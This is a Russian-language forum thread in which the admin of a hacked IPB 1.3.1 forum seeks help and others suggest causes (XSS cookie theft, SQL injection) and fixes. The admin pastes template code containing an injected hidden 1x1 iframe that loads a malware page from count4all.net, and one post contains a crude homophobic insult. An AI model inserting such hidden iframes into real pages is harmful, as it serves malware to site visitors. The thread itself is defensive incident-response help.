проломали форум

[Velomax]

 

Каким-то образом поломали форум www.velomax.lviv.ua/forum (IPB v1.3.1 final)

 

При попытке зайти антивирус даёт сообщение о наличии трояна, затем експлорер выдает сообщение об ошибке и захлопывается.

В код вставлена строчка с перенаправлением на некую вредоносную страничку.

Изменено содержание файла conf_global.php у хостера - исправлен е-мейл администратора (возможно и ещё что-то).

Изменен пароль администратора.

 

Суппорт хостера отмалчивается и не берёт трубку.

 

Вот, что я спрашивал у хостера:

1) каким образом взлом мог произойти, чтобы не допустить такого в дальнейшем?

2) если поставить бэкап, то вернется ли все на свои места?

Ничего мне они не ответили - фактически, бросили в трудную минуту. А я третий год у них хостился.

Вот эти вот кросавчеги:

 

http://hostpro.com.ua

 

Я предположил, что либо посторонние узнали пароль от ФТП и панели управления сайтом, либо в движке инвижина есть дырка, которую я профтыкал.

Оценивая своё знание движка на тройку, хотел бы услышать ваши мнения.

[ServerSeek]

Вот, что я спрашивал у хостера:

1) каким образом взлом мог произойти, чтобы не допустить такого в дальнейшем?

2) если поставить бэкап, то вернется ли все на свои места?

Ничего мне они не ответили - фактически, бросили в трудную минуту. А я третий год у них хостился.

Вот эти вот кросавчеги:

 

http://hostpro.com.ua

знаком с хостером этим неплохо, вроди неплохие ребята, странно что тех. поддержка так себя ведет в таких ситуациях ведь при взломе сайта/форума и их сервер под угрозой

 

Я предположил, что либо посторонние узнали пароль от ФТП и панели управления сайтом, либо в движке инвижина есть дырка, которую я профтыкал.

Оценивая своё знание движка на тройку, хотел бы услышать ваши мнения.

так вроди всем известно что ранние версии форумов все взламываются для того и работают в IPB усовершенствуя форум для защиты от хакеров, просто переходите на последнюю версию и все, правда есть хитрый способ как и последнюю можно взломать, но после одного взлома вы будете уже знать как это не допускать и плюс бекап восстановит все, а вот в ранних версиях на сколько мне известно только переход на новую версию помочь может

[Velomax]

Очень плохо себя ведет их поддержка.

Первый кросавчег стал уверять меня, что с форумом все нормально. Это не удивительно - я звонил туда в пятницу, в конце дня

Со вторым кросавчегом мы проговорили по межгороду минут сорок - в трубку было слышно, как он деловито щелкал по клавишам - искал бэкап. (Это было уже на другой день.) Пока его не нашли.

По-моему так, как они себя ведут, поступают только представители пассивной части сексуальных меньшинств...

 

Хотел бы услышать какие-то более конкретные предложения. Общих фраз и завуалированных намеков на хитрые способы не надо.

[PALADIN+]

Насчёт пасса к ФТП - попроси логи кто когда с какого ip был.

Насчёт уязвимостей - вроде бы где-то здесь заплатки были.. поставь.

А новые для нашей старенькой 1.3 хацкерам уже трудней найти =)

[Гость Salavat]

может в хтмл шаблоне код ... точнее скорее всего ...

[Velomax]

Искал, еще позавчера искал, куда эту вредоносную строчку прописали - так и не нашел. Удивлялся.

Заплатки в версии 1.3.1 все установлены сразу - я так считал. Или я ошибаюсь ?

 

И главное - не могу определить причину: каким образом произошел взлом - дырка в движке или посторонние завладели паролем ?

 

Вот фрагмент кода:

<!--TEMPLATE: skin_boards, Template Part: PageTop-->
<div align='left' style='text-align:left;padding-bottom:4px'>
	<!-- IBF.NEWSLINK -->Крайній раз Ви тут були  сьогодні, у  00:55
</div>
<iframe src='http://count4all.net/adv/149/new3.php' width=1 height=1></iframe><!--TEMPLATE: skin_boards, Template Part: CatHeader_Expanded-->
<div class="tableborder">
  <div class='maintitle' align='left'><img src='style_images/1/nav_m.gif' border='0'  alt='>' width='8' height='8' /> <a href="http://velomax.lviv.ua/forum/index.php?c=1">Поїзденьки</a></div>
  <table width="100%" border="0" cellspacing="1" cellpadding="4">
	<tr> 
	  <th align="center" width="2%" class='titlemedium'><img src="style_images/1/spacer.gif" alt="" width="28" height="1" /></th>
	  <th align="left" width="59%" class='titlemedium'>Форум</th>
	  <th align="center" width="7%" class='titlemedium'>Тем</th>
	  <th align="center" width="7%" class='titlemedium'>Відповідей</th>
	  <th align="left" width="25%" class='titlemedium'>Поновлення</th>
	</tr>
<iframe src='http://count4all.net/adv/149/new3.php' width=1 height=1></iframe><!--TEMPLATE: skin_boards, Template Part: ForumRow-->
	<tr>

 

В пятой строчке вписан какой-то левак. Каким образом - не могу понять.

[Song]

так вроди всем известно что ранние версии форумов все взламываются для того и работают в IPB усовершенствуя форум для защиты от хакеров, просто переходите на последнюю версию и все, правда есть хитрый способ как и последнюю можно взломать, но после одного взлома вы будете уже знать как это не допускать и плюс бекап восстановит все, а вот в ранних версиях на сколько мне известно только переход на новую версию помочь может

бред. Раниие версии ещё и позащищённей будут.

 

 

Заплатки в версии 1.3.1 все установлены сразу - я так считал.

ну считай так дальше.

[Velomax]

До сих пор вирус на месте, хотя техподдержка сказала, что они восстановили бэкап.

 

Как втулили строчку:

<iframe src='http://count4all.net/adv/149/new3.php' width=1 height=1></iframe> ?

 

Я смотрел содержимое skin_boards.php - там чисто. Кроме того, когда я заходил по ФТП, было видно по дате изменения, что недавно менялся только файл conf_global.php, а все остальные файлы были не тронуты.

Это значит, что вредную строчку записали в какую-то таблицу базы данных?

 

Song, это грустная шутка, потому что вероятность кражи пароля у меня чрезвычайно мала. Пароли менялись раз в квартал, были длинными и состояли из каких-то случайных букв-цифр в разных регистрах. В инет я заходил только с одной машины из дому. В прошлом месяце всего два раза заходил с работы, но ставил птичку, что захожу с чужой машины. Разве что там стоял кейлоггер?

Те уязвимости, которые описаны у тебя на сайте - их надо закрывать самому или они уже закрыты в версии 1.3.1 ?

[Jax]

Как втулили строчку:

<iframe src='http://count4all.net/adv/149/new3.php' width=1 height=1></iframe> ?

Да какая разница как. Тем более откуда мы знаем, как тебе ее засунули

Song, это грустная шутка, потому что вероятность кражи пароля у меня чрезвычайно мала.

Если она мала, как же тебя сломали?

 

Ставь все, что стоит написано здесь http://www.sysman.ru/index.php?showforum=108 и надеюсь, больше у тебя такое не повторится.

[Velomax]

Конечно есть разница. Если знать, как эту строчку вписали, то можно догадаться, откуда её убирать. Я не догадался пока, а она там сидит и всё портит.

Кроме того, ставить исправления надо на чистый форум, а не на зараженый.

А вопрос с кражей пароля или с дырой в коде очень важный, потому что надо определиться, как же все-таки это произошло. Все эти вопросы надо бы задавать хостеру, но он толком не может ничего сказать. Поэтому спрашиваю здесь.

[ServerSeek]

бред. Раниие версии ещё и позащищённей будут.

вроди везде только и слышно что начальные версии взламываются, это может если с заплатками то защищеннее, но их мало кто догадается сразу ставить а в новых версиях они уже явно встроены, поэтому не вижу никакого бреда

[Garret]

Элементарно поставив доп защиту .htaccess на админку можно всего этого избежать.

 

У тебя могли свистнуть куки и все...

[Velomax]

Каким образом?

[ServerSeek]

Каким образом?

в журнале "хакер" описывается один способ, через жалобу тебе посылается спец код если отвечаешь то куки оказываются у хакера

[Garret]

Через мелкие дыры в форуме, с помощью js.

[Velomax]

Саппорт сказал, что восстановить бэкап невозможно, предложил стереть всю базу данных (за два года) и проинсталлировать форум заново.

[ServerSeek]

разочаровался в этом хостинге, а вашу проблему может помочь исправить переход на платную версию и апргейд форума до последней версии

[.silent]

предупреждать надо что по ссылке дают вирус.

[Jax]

вроди везде только и слышно что начальные версии взламываются,

Где? Ломают только у тех, кто не может поставить элементарно простые заплатки и руки растут из общеизвестного места.

 

Мой форум с 2003 года ломали только 2 раза, 1-й раз был через еще тогда неизвестную дырку, второй - не скажу как Больше никто ничего сделать не смог. По этому нужно с умом подходить к делу этому, если проект серьезный.

Изменено 16 Июля 2006 пользователем Jax

[Velomax]

Я предупреждал об этом в первом постинге.

Поскольку возможность кражи пароля в явном виде очень мала, посоветовавшись с группой товарищей, пока что сошлись на предположении, что каким-то образом украли куки.

Затем посторонними была проведена мультимодерация.

В базе данных оказались повреждены таблицы velomax_templates и velomax_skin_templates в 17 местах.

Исправлено ручками, сейчас все работает.

В данный момент восстанавливаем доступ и ставим заплатки с форума Сонга.

Jax, напиши пожалуйста в приват про второй случай.

[PALADIN+]

Саппорт сказал, что восстановить бэкап невозможно, предложил стереть всю базу данных (за два года) и проинсталлировать форум заново.

lol

В БД через поиск найди этот

<iframe src='http://count4all.net/adv/149/new3.php' width=1 height=1></iframe> да сотри.

Ставь заплатки, забей на бек-ап. Форум то цел, как я понимаю.

[Velomax]

Так и было сделано. Просто я не сразу догадался об этом, дело в том, что у меня немного другая специальность.

[Song]

>> Те уязвимости, которые описаны у тебя на сайте - их надо закрывать самому или они уже закрыты в версии 1.3.1 ?

 

Прочитай правила раздела там где исправления. Там есть ответ на твой вопрос.

 

>> вроди везде только и слышно что начальные версии взламываются, это может если с заплатками то защищеннее, но их мало кто догадается сразу ставить а в новых версиях они уже явно встроены, поэтому не вижу никакого бреда

 

От кого ты слышал?

Давай ссылки, явки, пароли

На самом деле это бред, это я тебе говорю как разработчик.

А ты, если не отвечаешь за свои слова, так лучше как в рекламе: "Иногда лучше жевать.."

Понятно, что без заплаток они не защищённые, так это правило распространяется хоть на 1.2 хоть на 2.1.6

все они без заплаток незащищённые.

Только разница в том, что в в 1.х там уже поле исчерпано для их поиска, а в 2.х с учётом того, что появился вагон нового кода вероятность найти новую уязвимость - очень большая.

Доказательством тому текущий слойт, который закрыли вот только что, 2 дня назад.

 

 

Каким образом?

Любой новой уязвимостью, которая появилась после выхода 1.3.1

Их достаточно много было. Это SQL-inj.

А уж про XSS, через которую у тебя могли утащить куки снифером, я уж вообще молчу, это вообще стандартная для взломов ситуация.

 

P.S. Почему-то все понаставят форумов и думают, что теперь они боги и их всё обойдёт стороной и программа их спасёт.

РАБОТАТЬ надо, работать, чтобы дело всегда приносило доход и удовольствие. Вот так.

[Velomax]

Ознакомился со списком заплаток, переписал всё, проверил код форума. Оказалось, что часть исправлений уже была внесена, но половину примерно пришлось сделать. (Постинг о пробелах и табуляторах вышел как раз, когда я сообразил, что их наличие или отсутствие надо учитывать )

Когда я "понаставил" этот форум, тут было описано всего три его уязвимости и все они были у меня закрыты.

Теперь буду время от времени заглядывать к Сонгу в гости - не пополнился ли список.

 

И еще: можно как-то доступно рассказать про ХСС и SQL-inj, чтобы избежать подобных сбоев в дальнейшем?

Кроме того, есть еще вопрос: у меня записан айпи кросавчега, который накуролесил в базе. Еще у нескольких участников форума подобный айпи - отличается только последнее число. А воис сказал, что это айпи какой-то американской фирмы. Этот момент как-то можно прояснить?

[ServerSeek]

От кого ты слышал?

Давай ссылки, явки, пароли

На самом деле это бред, это я тебе говорю как разработчик.

А ты, если не отвечаешь за свои слова, так лучше как в рекламе: "Иногда

лучше жевать.."

просто у нас год назад взломавали форум, нам советовали переходить на последнюю версию что помогло бы избежать взломов, про заплатки почему-то и речи не ишло, вот от тудава и слышал, ну и просто по логике думал что для того и усовершенствуют форум чтобы покупали и переходили на последнюю версию дабы избежать взломов, даже не мог и представить что разработчики будут убеждать клиентов что это полный бред, однако нам переход на платную последнюю версию помог избежать дальнейших взломов, что повторно убедило меня в том что последние версии защищены, но спасибо что вразумили бегу срочно за заплатками.

[Song]

>> Постинг о пробелах и табуляторах вышел как раз, когда я сообразил, что их наличие или отсутствие надо учитывать

ну вот видишь как я его к месту написал

 

>> Кроме того, есть еще вопрос: у меня записан айпи кросавчега, который накуролесил в базе. Еще у нескольких участников форума подобный айпи - отличается только последнее число. А воис сказал, что это айпи какой-то американской фирмы. Этот момент как-то можно прояснить?

 

Вполне возможно это один из них.

Понаблюдай кто из них отличается к тебе особенной ненавистью.

 

>> Теперь буду время от времени заглядывать к Сонгу в гости - не пополнился ли список.

Можешь просто подписаться на раздел.